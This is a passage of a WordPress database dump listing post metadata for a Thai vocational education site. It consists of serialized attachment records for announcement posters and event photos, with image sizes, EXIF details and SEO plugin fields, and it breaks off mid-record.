(9670, 4282, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:1182;s:4:\"file\";s:95:\"2018/11/ประกาศ-อวท-โครงการธรรมะสอนใจ-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:95:\"ประกาศ-อวท-โครงการธรรมะสอนใจ-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:95:\"ประกาศ-อวท-โครงการธรรมะสอนใจ-01-300x101.png\";s:5:\"width\";i:300;s:6:\"height\";i:101;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:95:\"ประกาศ-อวท-โครงการธรรมะสอนใจ-01-768x259.png\";s:5:\"width\";i:768;s:6:\"height\";i:259;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:96:\"ประกาศ-อวท-โครงการธรรมะสอนใจ-01-1024x345.png\";s:5:\"width\";i:1024;s:6:\"height\";i:345;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:95:\"ประกาศ-อวท-โครงการธรรมะสอนใจ-01-400x135.png\";s:5:\"width\";i:400;s:6:\"height\";i:135;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9671, 4285, '_wp_attached_file', '2018/11/ประกาศ-อวท-โครงการอบรมการเขียนโปรแกรมเชิงวัตถุ-01.png'),
(9672, 4285, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:1182;s:4:\"file\";s:149:\"2018/11/ประกาศ-อวท-โครงการอบรมการเขียนโปรแกรมเชิงวัตถุ-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:149:\"ประกาศ-อวท-โครงการอบรมการเขียนโปรแกรมเชิงวัตถุ-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:149:\"ประกาศ-อวท-โครงการอบรมการเขียนโปรแกรมเชิงวัตถุ-01-300x101.png\";s:5:\"width\";i:300;s:6:\"height\";i:101;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:149:\"ประกาศ-อวท-โครงการอบรมการเขียนโปรแกรมเชิงวัตถุ-01-768x259.png\";s:5:\"width\";i:768;s:6:\"height\";i:259;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:150:\"ประกาศ-อวท-โครงการอบรมการเขียนโปรแกรมเชิงวัตถุ-01-1024x345.png\";s:5:\"width\";i:1024;s:6:\"height\";i:345;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:149:\"ประกาศ-อวท-โครงการอบรมการเขียนโปรแกรมเชิงวัตถุ-01-400x135.png\";s:5:\"width\";i:400;s:6:\"height\";i:135;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9673, 4288, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-โครงการอบรมเชิงวัตถุ-01.png'),
(9674, 4288, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1754;s:6:\"height\";i:2481;s:4:\"file\";s:109:\"2018/11/ประกาศ-อวท-2561-โครงการอบรมเชิงวัตถุ-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:109:\"ประกาศ-อวท-2561-โครงการอบรมเชิงวัตถุ-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:109:\"ประกาศ-อวท-2561-โครงการอบรมเชิงวัตถุ-01-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:110:\"ประกาศ-อวท-2561-โครงการอบรมเชิงวัตถุ-01-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:110:\"ประกาศ-อวท-2561-โครงการอบรมเชิงวัตถุ-01-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:109:\"ประกาศ-อวท-2561-โครงการอบรมเชิงวัตถุ-01-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9675, 4292, '_edit_lock', '1597891580:14'),
(9676, 4293, '_wp_attached_file', '2018/11/9-11-2561-11-52-26.jpg'),
(9677, 4292, '_edit_last', '3'),
(9678, 4293, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:880;s:6:\"height\";i:538;s:4:\"file\";s:30:\"2018/11/9-11-2561-11-52-26.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"9-11-2561-11-52-26-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"9-11-2561-11-52-26-300x183.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"9-11-2561-11-52-26-768x470.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:470;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"9-11-2561-11-52-26-400x245.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9679, 4294, '_wp_attached_file', '2018/11/9-11-2561-11-56-08.jpg'),
(9680, 4294, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:896;s:6:\"height\";i:383;s:4:\"file\";s:30:\"2018/11/9-11-2561-11-56-08.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"9-11-2561-11-56-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"9-11-2561-11-56-08-300x128.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"9-11-2561-11-56-08-768x328.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:328;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"9-11-2561-11-56-08-400x171.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9681, 4295, '_wp_attached_file', '2018/11/9-11-2561-12-24-13.jpg'),
(9682, 4295, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1098;s:6:\"height\";i:645;s:4:\"file\";s:30:\"2018/11/9-11-2561-12-24-13.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"9-11-2561-12-24-13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"9-11-2561-12-24-13-300x176.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"9-11-2561-12-24-13-768x451.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"9-11-2561-12-24-13-1024x602.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:602;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"9-11-2561-12-24-13-400x235.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9683, 4296, '_wp_attached_file', '2018/11/9-11-2561-12-06-29.jpg'),
(9684, 4296, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:929;s:6:\"height\";i:730;s:4:\"file\";s:30:\"2018/11/9-11-2561-12-06-29.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"9-11-2561-12-06-29-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"9-11-2561-12-06-29-300x236.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:236;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"9-11-2561-12-06-29-768x603.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:603;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"9-11-2561-12-06-29-382x300.jpg\";s:5:\"width\";i:382;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9685, 4297, '_wp_attached_file', '2018/11/9-11-2561-12-13-04.jpg'),
(9686, 4297, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:827;s:6:\"height\";i:1118;s:4:\"file\";s:30:\"2018/11/9-11-2561-12-13-04.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"9-11-2561-12-13-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"9-11-2561-12-13-04-222x300.jpg\";s:5:\"width\";i:222;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"9-11-2561-12-13-04-768x1038.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1038;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"9-11-2561-12-13-04-757x1024.jpg\";s:5:\"width\";i:757;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"9-11-2561-12-13-04-222x300.jpg\";s:5:\"width\";i:222;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9687, 4292, '_hide_featured', NULL),
(9688, 4292, '_yoast_wpseo_content_score', '90'),
(9689, 3220, '_yoast_wpseo_content_score', '90'),
(9690, 4301, '_edit_lock', '1541743130:3'),
(9691, 4301, '_edit_last', '3'),
(9692, 4302, '_wp_attached_file', '2018/11/การแข่งขันทักษะ-PLC-ระดับภาค-พร้อมตารางตรวจ.pdf'),
(9696, 4301, '_hide_featured', NULL),
(9697, 4301, '_yoast_wpseo_content_score', '60'),
(9698, 4301, '_yoast_wpseo_primary_category', '3'),
(9699, 4301, '_wpas_done_all', '1'),
(9700, 4304, '_edit_lock', '1541743687:3'),
(9701, 4304, '_edit_last', '3'),
(9702, 4305, '_wp_attached_file', '2018/11/9-11-2561-13-08-26.jpg'),
(9703, 4305, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:461;s:6:\"height\";i:638;s:4:\"file\";s:30:\"2018/11/9-11-2561-13-08-26.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"9-11-2561-13-08-26-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"9-11-2561-13-08-26-217x300.jpg\";s:5:\"width\";i:217;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"9-11-2561-13-08-26-217x300.jpg\";s:5:\"width\";i:217;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9704, 4306, '_wp_attached_file', '2018/11/45672259_704227973286727_5247252611714777088_o.jpg'),
(9705, 4306, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/11/45672259_704227973286727_5247252611714777088_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"45672259_704227973286727_5247252611714777088_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"45672259_704227973286727_5247252611714777088_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"45672259_704227973286727_5247252611714777088_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"45672259_704227973286727_5247252611714777088_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"45672259_704227973286727_5247252611714777088_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9706, 4304, '_thumbnail_id', '4306'),
(9710, 4304, '_hide_featured', NULL),
(9711, 4304, '_yoast_wpseo_content_score', '30'),
(9712, 4304, '_yoast_wpseo_primary_category', '31'),
(9713, 4304, '_wpas_done_all', '1'),
(9714, 4301, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575657648;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5026;}i:1;a:1:{s:2:\"id\";i:6119;}i:2;a:1:{s:2:\"id\";i:4765;}}}}'),
(9715, 4304, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575438201;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4632;}i:1;a:1:{s:2:\"id\";i:4704;}i:2;a:1:{s:2:\"id\";i:5760;}}}}'),
(9716, 4309, '_wp_attached_file', '2018/10/9-11-2561-15-01-06.jpg'),
(9717, 4309, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1273;s:6:\"height\";i:849;s:4:\"file\";s:30:\"2018/10/9-11-2561-15-01-06.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"9-11-2561-15-01-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"9-11-2561-15-01-06-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"9-11-2561-15-01-06-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"9-11-2561-15-01-06-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"9-11-2561-15-01-06-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9720, 4313, '_wp_attached_file', '2018/11/2-Arun-Roysri-copy.jpg'),
(9721, 4313, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:30:\"2018/11/2-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"2-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"2-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"2-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"2-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"2-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:11:\"ARUN ROISRI\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1483228683\";s:9:\"copyright\";s:11:\"ARUN ROISRI\";s:12:\"focal_length\";s:2:\"20\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9722, 4314, '_wp_attached_file', '2018/11/3-Arun-Roysri-copy.jpg'),
(9723, 4314, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:30:\"2018/11/3-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"3-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"3-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"3-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"3-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"3-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477648949\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:2:\"32\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9724, 4315, '_wp_attached_file', '2018/11/4-Arun-Roysri-copy.jpg'),
(9725, 4315, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:30:\"2018/11/4-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"4-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"4-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"4-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"4-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"4-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"2\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477930544\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:3:\"135\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9726, 4316, '_wp_attached_file', '2018/11/12-Arun-Roysri-copy.jpg'),
(9727, 4316, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/12-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"12-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"12-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"12-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"12-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"12-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON 